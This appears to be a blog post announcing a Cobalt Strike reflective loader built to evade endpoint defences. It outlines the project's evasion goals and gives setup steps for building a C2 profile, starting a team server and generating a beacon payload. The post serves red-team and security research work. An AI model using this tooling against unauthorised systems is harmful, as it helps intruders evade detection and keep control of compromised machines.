Cobalt Strike User-Defined Reflective Loader v1.0 releases

by do son · Published · Updated

Cobalt Strike User-Defined Reflective Loader

Cobalt Strike User-Defined Reflective Loader

Cobalt Strike User-Defined Reflective Loader written in Assembly & C for advanced evasion capabilities.

Initial Project Goals

  • Learn how Reflective Loader works.
  • Write a Reflective Loader in Assembly.
  • Compatible with Cobalt Strike.
  • Cross compile from macOS/Linux.
  • Implement Inline-Assembly into a C project.

Future Project Goals

  • Use the initial project as a template for more advanced evasion techniques leveraging the flexibility of Assembly.
  • Implement Cobalt Strike options such as no RWX, stompPE, module stomping, changing the MZ header, etc.
  • Write a decent Aggressor script.
  • Support x86.
  • Have different versions of the reflective loader to choose from.
  • Implement HellsGate/HalosGate for the initial calls that reflective loader uses (pNtFlushInstructionCache, VirtualAlloc, GetProcAddress, LoadLibraryA, etc).
  • Optimize the assembly code.
  • Hash/obfuscate strings.
  • Some kind of template language overlay that can modify/randomize the registers/methods.

Usage

  1. Start your Cobalt Strike Team Server with or without a profile
  • At the moment I’ve only tested without a profile and with a few profiles generated from Tylous’s epic SourcePoint project
    #### This profile stuff below is optional, but this is the profile I tested this Reflective Loader with ####

    # Install Go on Kali if you need it

    sudo apt install golang-go -y

    # Creating a Team Server Cobalt Strike profile with SourcePoint

    ## Clone the SourcePoint project

    git clone https://github.com/Tylous/SourcePoint.git

    ## Build SourcePoint Go project

    cd SourcePoint

    go build SourcePoint.go

    ## Run it with some cool flags (look at the help menu for more info)

    ### This is the settings I have tested UD Reflective Loader with

    ./SourcePoint -PE_Clone 18 -PostEX_Name 13 -Sleep 3 -Profile 4 -Outfile myprofile.profile -Host <TeamServer> -Injector NtMapViewOfSection

    ## Start Team Server

    cd ../

    sudo ./teamserver  <TeamServer> 'T3@Ms3Rv3Rp@$$w0RD' SourcePoint/myprofile.profile

     

     

     

  1. Go to your Cobalt Strike GUI and import the rdll_loader.cna Agressor script
  2. Generate your x64 payload (Attacks -> Packages -> Windows Executable (S))
  • Does not support the x86 option. The x86 bin is the original Reflective Loader object file.
  1. Use the Script Console to make sure that the beacon created successfully with this User-Defined Reflective Loader
  • If successful, the output in the Script Console will look like this: Cobalt Strike User-Defined Reflective Loader

Change log v1.0

Massive update from @s4ntiago_p! New 32bit loader with WOW64 support, 32bit Halos&HellsGate, code optimizations & bug fixes!

Install

Tags: Cobalt Strike User-Defined Reflective Loader